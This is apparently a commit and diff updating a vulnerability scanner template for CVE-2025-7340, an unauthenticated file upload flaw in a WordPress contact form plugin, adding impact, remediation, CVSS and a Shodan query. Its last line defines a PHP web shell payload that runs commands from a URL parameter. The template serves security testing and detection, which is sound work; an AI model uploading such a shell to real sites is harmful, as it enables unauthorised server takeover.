Review and update CVE-2025-7340 template

- Add impact and remediation sections
- Add proper reference links
- Add CVSS classification data
- Add vendor/product metadata
- Add Shodan query for detection
- Update tags to include vendor name
- Mark as verified and set max-request

http/cves/2025/CVE-2025-7340.yaml

@@ -6,7 +6,25 @@ info:
   severity: critical
   description: |
     The HT Contact Form Widget plugin for WordPress (≤ v2.2.1) lacks proper file type validation in the temp_file_upload function. This allows unauthenticated attackers to upload arbitrary files to the server.
-  tags: cve,cve2025,wordpress,intrusive,rce,htcontact,plugin,file-upload
+  impact: |
+    Unauthenticated attackers can upload and execute arbitrary files on the server, potentially leading to complete system compromise including data theft, malicious code execution, and server takeover.
+  remediation: |
+    Update the HT Contact Form Widget plugin to a version newer than 2.2.1 or remove the plugin if no patch is available.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-7340
+    - https://wordpress.org/plugins/ht-contactform/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-7340
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: htheme
+    product: ht_contact_form_widget
+    shodan-query: http.html:"wp-content/plugins/ht-contactform"
+  tags: cve,cve2025,wordpress,intrusive,rce,htcontact,plugin,file-upload,htheme
 
 variables:
   payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'